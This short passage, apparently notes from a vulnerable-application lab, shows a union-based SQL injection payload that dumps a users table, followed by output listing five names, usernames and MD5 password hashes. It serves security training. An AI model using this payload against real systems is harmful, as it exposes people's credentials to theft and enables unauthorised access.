To retrieve all the passwords type:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

#OUTPUT:
	ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
	First name: 
	Surname: admin
	admin	
	admin
	5f4dcc3b5aa765d61d8327deb882cf99

	ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
	First name:
	Surname: Gordon
	Brown
	gordonb
	e99a18c428cb38d5f260853678922e03

	ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
	First name: 
	Surname: Hack
	Me
	1337
	8d3533d75ae2c3966d7e0d4fcc69216b

	ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
	First name:
	Surname: Pablo
	Picasso
	pablo
	0d107d09f5bbe40cade3de5c71e9e9b7

	ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
	First name: 
	Surname: Bob
	Smith
	smithy
	5f4dcc3b5aa765d61d8327deb882cf99